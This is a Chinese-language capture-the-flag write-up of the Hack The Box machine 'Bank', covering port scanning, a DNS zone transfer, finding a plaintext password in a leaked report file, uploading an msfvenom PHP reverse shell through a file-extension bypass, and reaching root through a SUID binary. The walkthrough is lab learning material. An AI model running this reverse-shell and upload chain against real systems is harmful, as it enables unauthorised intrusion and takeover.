Bank(Clear Text Credentials,SUID)

開放端口

┌──(root?rock)-[~]
└─# nmap -p- --open 10.10.10.29 -Pn
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-23 08:34 EDT
Stats: 0:00:23 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 93.67% done; ETC: 08:35 (0:00:02 remaining)
Nmap scan report for 10.10.10.29
Host is up (0.073s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
53/tcp open  domain
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 25.23 seconds

詳細端口信息

┌──(root?rock)-[~]
└─# nmap -sV -Pn -A -O 10.10.10.29 -p 22,53,80                                 
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-23 08:36 EDT
Nmap scan report for 10.10.10.29
Host is up (0.072s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 08:ee:d0:30:d5:45:e4:59:db:4d:54:a8:dc:5c:ef:15 (DSA)
|   2048 b8:e0:15:48:2d:0d:f0:f1:73:33:b7:81:64:08:4a:91 (RSA)
|   256 a0:4c:94:d1:7b:6e:a8:fd:07:fe:11:eb:88:d5:16:65 (ECDSA)
|_  256 2d:79:44:30:c8:bb:5e:8f:07:cf:5b:72:ef:a1:6d:67 (ED25519)
53/tcp open  domain  ISC BIND 9.9.5-3ubuntu0.14 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.9.5-3ubuntu0.14-Ubuntu
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.7 (Ubuntu)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.13 (95%), Linux 3.16 (95%), Linux 3.2 - 4.9 (95%), Linux 4.8 (95%), Linux 4.4 (95%), Linux 4.9 (95%), Linux 3.12 (95%), Linux 3.8 - 3.11 (95%), Linux 4.2 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 80/tcp)
HOP RTT      ADDRESS
1   72.25 ms 10.10.14.1
2   73.27 ms 10.10.10.29

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.26 seconds

DNS

首先按照htb的習慣匾竿,我們假定靶機的域名是bank.htb脏毯,依此執(zhí)行Zone Transfer

┌──(root??kali)-[~/htb/bank]
└─# dig axfr bank.htb @10.10.10.29

; <<>> DiG 9.18.0-2-Debian <<>> axfr bank.htb @10.10.10.29
;; global options: +cmd
bank.htb.               604800  IN      SOA     bank.htb. chris.bank.htb. 5 604800 86400 2419200 604800
bank.htb.               604800  IN      NS      ns.bank.htb.
bank.htb.               604800  IN      A       10.10.10.29
ns.bank.htb.            604800  IN      A       10.10.10.29
www.bank.htb.           604800  IN      CNAME   bank.htb.
bank.htb.               604800  IN      SOA     bank.htb. chris.bank.htb. 5 604800 86400 2419200 604800
;; Query time: 971 msec
;; SERVER: 10.10.10.29#53(10.10.10.29) (TCP)
;; WHEN: Thu Sep 29 01:54:32 EDT 2022
;; XFR size: 6 records (messages 1, bytes 171)

果然爆出了幾個域名

bank.htb滴某,www.bank.htb乡翅,ns.bank.htb剪个,chris.bank.htb全部添加進host文件

www.bank.htb秧骑,ns.bank.htb,chris.bank.htb導向了apache開始頁

bank.htb導向一個登陸頁面

web

從bank.htb的登陸頁面可知網(wǎng)站是用php寫的,我們在爆破目錄的時候可以帶上php后綴

┌──(root?rock)-[~]
└─# gobuster dir -t 50  --no-error --url http://bank.htb -w /usr/share/wordlists/Web-Content/directory-list-2.3-medium.txt -x php
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://bank.htb
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/wordlists/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
2022/09/29 14:06:54 Starting gobuster in directory enumeration mode
===============================================================
/uploads              (Status: 301) [Size: 305] [--> http://bank.htb/uploads/]
/assets               (Status: 301) [Size: 304] [--> http://bank.htb/assets/] 
/login.php            (Status: 200) [Size: 1974]                              
/support.php          (Status: 302) [Size: 3291] [--> login.php]              
/index.php            (Status: 302) [Size: 7322] [--> login.php]              
/logout.php           (Status: 302) [Size: 0] [--> index.php]                 
/inc                  (Status: 301) [Size: 301] [--> http://bank.htb/inc/]    
/server-status        (Status: 403) [Size: 288]                               
/balance-transfer     (Status: 301) [Size: 314] [--> http://bank.htb/balance-transfer/]
                                                                                       
===============================================================
2022/09/29 14:18:03 Finished
===============================================================

/balance-transfer頁面列出了很多.acc文件乎折,內(nèi)容大概是:

++OK ENCRYPT SUCCESS
+=================+
| HTB Bank Report |
+=================+

===UserAccount===
Full Name: balance-transfer
Email: H7SACcJdBQfDCk1uCXeeEO2WZkpmfwFXExxgKhtl8JYK40eGXsVChXygiYDxujv8Q3pAkTWtDUdHVsnSVjvch3tz167wpCEgF4R0YNtBIHiD9Gw4Z1hh4KQ6QYCgAhxg
Password: mohkbKVUrexBU4GU5XbaH2hy0UPBbmRyK8TWTPQl3oWXsCSxA3Ii5ZR6TGH53zDNIwKBmBXpZUnswfZ7jIppHgvAWdFZMjNuQy6c93C9YZBufBCyj1X0itBfGgetA2Yr
CreditCards: 3
Transactions: 13
Balance: 6423573 .
===UserAccount===

foothold

可以看見有Email和Password字段绒疗,但是被加密了。一開始以為是base64笆檀,但嘗試解密失敗

++OK ENCRYPT SUCCESS表明加密成功會打印這一行忌堂,這個文件可能是某種日志,有成功的就有可能有失敗的打印

一個個文件查看不太現(xiàn)實酗洒,最好寫腳本或者用命令行去比較文件的差異

這里我直接抄0xdf的命令。枷遂。

比較頁面字數(shù)樱衷,從低到高排列

┌──(root??kali)-[~/htb/bank]
└─# curl -s http://bank.htb/balance-transfer/ | grep -F '.acc' | grep -Eo '[a-f0-9]{32}\.acc.*"right">.+ ' | cut -d'>' -f1,7 | tr '">' ' ' | sort -k2 -n | head
68576f20e9732f1b2edc4df5b8533230.acc  257 
09ed7588d1cd47ffca297cc7dac22c52.acc  581 
941e55bed0cb8052e7015e7133a5b9c7.acc  581 
052a101eac01ccbf5120996cdc60e76d.acc  582 
0d64f03e84187359907569a43c83bddc.acc  582 
10805eead8596309e32a6bfe102f7b2c.acc  582 
20fd5f9690efca3dc465097376b31dd6.acc  582 
346bf50f208571cd9d4c4ec7f8d0b4df.acc  582 
70b43acf0a3e285c423ee9267acaebb2.acc  582 
780a84585b62356360a9495d9ff3a485.acc  582 

有一個字數(shù)短了一大半,查看這個文件

┌──(root??kali)-[~/htb/bank]
└─# curl http://bank.htb/balance-transfer/68576f20e9732f1b2edc4df5b8533230.acc
--ERR ENCRYPT FAILED
+=================+
| HTB Bank Report |
+=================+

===UserAccount===
Full Name: Christos Christopoulos
Email: chris@bank.htb
Password: !##HTBB4nkP4ssw0rd!##
CreditCards: 5
Transactions: 39
Balance: 8842803 .
===UserAccount===

--ERR ENCRYPT FAILED表明加密失敗酒唉,露出了明文密碼

使用這個密碼在首頁登陸矩桂,順利進入后臺

在support頁面有一個上傳文件功能

查看網(wǎng)頁源代碼發(fā)現(xiàn)這一句

[DEBUG] I added the file extension .htb to execute as php for debugging purposes only [DEBUG]

看來只需要把php后綴換成htb就可以繞過

編譯一個php馬

msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.16.3 LPORT=4444 -f raw > shell.php

換成htb后綴

mv shell.php shell.htb 

上傳,點擊痪伦,拿到立足點

msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.16.3:4444 
[*] Sending stage (39860 bytes) to 10.10.10.29
[*] Meterpreter session 1 opened (10.10.16.3:4444 -> 10.10.10.29:40126) at 2022-09-29 02:49:59 -0400

meterpreter > getuid
Server username: www-data

提權

枚舉所有SUID

www-data@bank:/home/chris$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/var/htb/bin/emergency
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/bin/at
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/pkexec
/usr/bin/newgrp
/usr/bin/traceroute6.iputils
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/mtr
/usr/sbin/uuidd
/usr/sbin/pppd
/bin/ping
/bin/ping6
/bin/su
/bin/fusermount
/bin/mount
/bin/umount

發(fā)現(xiàn)一個不常見的SUID

/var/htb/bin/emergency

嘗試執(zhí)行侄榴,直接提權到了root。网沾。

www-data@bank:/home/chris$ /var/htb/bin/emergency
/var/htb/bin/emergency
# id
id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=0(root),33(www-data)
# whoami
whoami
root

?著作權歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末癞蚕,一起剝皮案震驚了整個濱河市,隨后出現(xiàn)的幾起案子辉哥,更是在濱河造成了極大的恐慌桦山,老刑警劉巖,帶你破解...
    沈念sama閱讀 221,273評論 6 515
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件醋旦,死亡現(xiàn)場離奇詭異恒水,居然都是意外死亡,警方通過查閱死者的電腦和手機饲齐,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 94,349評論 3 398
  • 文/潘曉璐 我一進店門钉凌,熙熙樓的掌柜王于貴愁眉苦臉地迎上來,“玉大人捂人,你說我怎么就攤上這事御雕。” “怎么了先慷?”我有些...
    開封第一講書人閱讀 167,709評論 0 360
  • 文/不壞的土叔 我叫張陵饮笛,是天一觀的道長。 經(jīng)常有香客問我论熙,道長福青,這世上最難降的妖魔是什么? 我笑而不...
    開封第一講書人閱讀 59,520評論 1 296
  • 正文 為了忘掉前任,我火速辦了婚禮无午,結(jié)果婚禮上媒役,老公的妹妹穿的比我還像新娘。我一直安慰自己宪迟,他們只是感情好酣衷,可當我...
    茶點故事閱讀 68,515評論 6 397
  • 文/花漫 我一把揭開白布。 她就那樣靜靜地躺著次泽,像睡著了一般穿仪。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發(fā)上意荤,一...
    開封第一講書人閱讀 52,158評論 1 308
  • 那天啊片,我揣著相機與錄音,去河邊找鬼玖像。 笑死紫谷,一個胖子當著我的面吹牛,可吹牛的內(nèi)容都是我干的捐寥。 我是一名探鬼主播笤昨,決...
    沈念sama閱讀 40,755評論 3 421
  • 文/蒼蘭香墨 我猛地睜開眼,長吁一口氣:“原來是場噩夢啊……” “哼握恳!你這毒婦竟也來了瞒窒?” 一聲冷哼從身側(cè)響起,我...
    開封第一講書人閱讀 39,660評論 0 276
  • 序言:老撾萬榮一對情侶失蹤睡互,失蹤者是張志新(化名)和其女友劉穎根竿,沒想到半個月后,有當?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體就珠,經(jīng)...
    沈念sama閱讀 46,203評論 1 319
  • 正文 獨居荒郊野嶺守林人離奇死亡寇壳,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 38,287評論 3 340
  • 正文 我和宋清朗相戀三年,在試婚紗的時候發(fā)現(xiàn)自己被綠了妻怎。 大學時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片壳炎。...
    茶點故事閱讀 40,427評論 1 352
  • 序言:一個原本活蹦亂跳的男人離奇死亡,死狀恐怖逼侦,靈堂內(nèi)的尸體忽然破棺而出匿辩,到底是詐尸還是另有隱情,我是刑警寧澤榛丢,帶...
    沈念sama閱讀 36,122評論 5 349
  • 正文 年R本政府宣布铲球,位于F島的核電站,受9級特大地震影響晰赞,放射性物質(zhì)發(fā)生泄漏稼病。R本人自食惡果不足惜选侨,卻給世界環(huán)境...
    茶點故事閱讀 41,801評論 3 333
  • 文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望然走。 院中可真熱鬧援制,春花似錦、人聲如沸芍瑞。這莊子的主人今日做“春日...
    開封第一講書人閱讀 32,272評論 0 23
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽拆檬。三九已至洪己,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間竟贯,已是汗流浹背码泛。 一陣腳步聲響...
    開封第一講書人閱讀 33,393評論 1 272
  • 我被黑心中介騙來泰國打工, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留澄耍,地道東北人。 一個月前我還...
    沈念sama閱讀 48,808評論 3 376
  • 正文 我出身青樓晌缘,卻偏偏與公主長得像齐莲,于是被迫代替她去往敵國和親。 傳聞我的和親對象是個殘疾皇子磷箕,可洞房花燭夜當晚...
    茶點故事閱讀 45,440評論 2 359

推薦閱讀更多精彩內(nèi)容

  • Spring Cloud為開發(fā)人員提供了快速構建分布式系統(tǒng)中一些常見模式的工具(例如配置管理选酗,服務發(fā)現(xiàn),斷路器岳枷,智...
    卡卡羅2017閱讀 134,693評論 18 139
  • 我使用的是火狐瀏覽器 使用火狐瀏覽器的hackbar插件 如果有錯誤的地方希望大家多多指出芒填,多謝多謝 WEB2 點...
    yangc隨想閱讀 54,297評論 11 16
  • 語 句 功 能 數(shù)據(jù)操作 SELECT——從數(shù)據(jù)庫表中檢索數(shù)據(jù)行和列INSERT——向數(shù)據(jù)庫表添加新數(shù)據(jù)行DELE...
    戰(zhàn)敭閱讀 5,100評論 0 53
  • 我們的培訓目標是讓您學會盛泡,而不是僅僅給您一堆教程去看闷祥!私塾式小班精講,免費重聽傲诵。 八期培訓課程結(jié)束凯砍。 http:/...
    塵世不擾閱讀 278評論 0 1
  • 我們的培訓目標是讓您學 會 ,而不是僅僅給您一堆教程去 看 拴竹!私塾式小班精講悟衩,免費重聽。 八期培訓課程...
    塵世不擾閱讀 178評論 0 1